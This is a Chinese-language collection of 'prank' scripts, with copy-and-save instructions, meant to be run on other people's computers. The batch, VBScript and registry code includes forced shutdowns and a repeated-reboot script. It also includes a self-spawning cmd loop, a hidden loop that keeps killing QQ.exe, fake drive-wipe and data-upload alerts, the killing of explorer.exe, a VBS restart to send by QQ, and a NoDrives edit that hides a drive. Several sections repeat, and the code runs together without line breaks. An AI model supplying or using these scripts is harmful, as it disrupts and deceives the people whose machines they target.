“请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”shutdown -s -f -t 12、@echo offecho 你中招了:astart cmd.EⅩEstart %0goto a@ color 4f@echo offecho 删除计算机的C盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.echo 删除计算机的D盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.。
if "%1" == "h" goto beginmshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit :begintasklist |find /i "QQ.exe"if %errorlevel%==0 (goto killit) else (goto next):killittaskkill /f /im QQ.exe:nextping -n 3 127.t >nul 2>nulgoto begin——————————分割线————————把以上代码保存成txt格式,然后把后缀改成bat,然后双击运行嘿嘿,那你的qq就不能运行了哟@ color 4f@echo offecho 删除计算机的C盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.echo 删除计算机的D盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.echo 删除计算机的E盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.echo. =========================================echo. 啊哈哈,都删关,都杀关,哈哈……echo. =========================================echo. 系统将马上崩溃......echo. 这是一个木马程序......您的所有资料已经传到XXXX@shutdown /r /t 30 /c "电脑在30s内即将崩溃,哈哈,你活该!"ntsd -c q -pn explorer.exeping 127.0.0.1 /n 20 >nulstart explorer.exeshutdown -a____________________________分割线______________________将分割线以上部分保存到txt格式,然后把后缀改成bat就可以运行了运行后你的磁盘会被格式化当然那是假的。
.整人代码大全让对方重启指定次数 (害人专用 )@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启 5 次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启 6 次改成 7 就是 7 次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat ”,你的批量处理器就完成了。
善意恶搞关机首先呢 ,我们在桌面创建个新文件夹然后打开,在上面找到 - 工具 T- 文件夹选项 O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作 .在桌面建立个记事本 ,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···""",0 ,truedim ado while(a <> "我是猪")a = inputbox (" 说我是猪 ,就不关机,快撒,说"" 我是猪 """," 说不说 "," 不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢 ,把后缀修改为 .vbs 或者改变打开方式为应用程序,这样你再压缩下用 QQ 发给你朋友,对方打开了就在60 秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
⽤QQ整⼈使对⽅关机代码-不是病毒-娱乐⼀下整整⼈on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就⼀分钟关你机,不信,试试···"" ",0 ,true dim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就⾏了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,你确实是⼀头猪~"----------------------------------------------------------------------------------------------------------------------将横线内的代码复制到记事本内~~然后另存为名字随便你起记住后⾯的⼀定要加.vbe把⽂件传送给对⽅~~只要对⽅⼀打开⼀分钟就会关机,如上⾯说的,要你说那三个字,就不会关机了哈哈⼤家试试吧。
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。
一、怎么点都没反应的桌面如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。
他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中…………附带:print键截屏方法:键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。
用法二,先按住“Alt”键,再按“Print Screen SysRq”键,则是对当前窗口进行抓图。
如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。
哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!二、让电脑硬盘消失-隐藏磁盘方法愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!步骤1.新建一个记事本2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”3.将下面的代码复制到记事本当中:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00解释(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的图中的D盘已经神秘消失了。